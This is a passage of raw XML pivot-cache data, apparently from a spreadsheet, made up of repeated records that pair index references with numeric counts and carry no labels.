    <x v="881"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="881"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="881"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="881"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="881"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="881"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="881"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="156"/>
    <x v="881"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="881"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="881"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="881"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="881"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="881"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="881"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="72"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="61"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="496"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1388"/>
    <x v="449"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="882"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="3"/>
    <x v="882"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="882"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="882"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="882"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="882"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="883"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="883"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="883"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="883"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="883"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="884"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="884"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="884"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="884"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="884"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="884"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="884"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="885"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="885"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="885"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="885"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="885"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="885"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="885"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="318"/>
    <x v="18"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="13"/>
    <x v="18"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="18"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="886"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="886"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="886"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="886"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="886"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="887"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="887"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="887"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="887"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="887"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="887"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="887"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="887"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="887"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="887"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="887"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="887"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="887"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="887"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="888"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="888"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="888"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="888"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="888"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="888"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="888"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="888"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="888"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="888"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="888"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="888"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="888"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="888"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="889"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="889"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="889"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="889"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="889"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="889"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="889"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="890"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="890"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="890"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="890"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="890"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="890"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="890"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="890"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="890"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="10"/>
    <x v="890"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="891"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="891"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="891"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="891"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="891"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="892"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="892"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="892"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="892"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="892"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="893"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="893"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="893"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="893"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="893"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="893"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="893"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="894"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="894"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="894"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="894"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="894"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="894"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="894"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="894"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="894"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="894"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="894"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="894"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="894"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="894"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="895"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="895"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="895"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="895"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="895"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="896"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="896"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="896"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="896"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="896"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="896"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="896"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="896"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="896"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="896"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="896"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="896"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="896"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="896"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="897"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="897"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="897"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="898"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="898"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="898"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="898"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="898"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="898"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="898"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="898"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="898"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="898"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="898"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="898"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="898"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="898"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="899"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="899"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="899"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="899"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="899"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="899"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="900"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="900"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="900"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="900"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="900"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="900"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="900"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="901"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="901"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="901"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
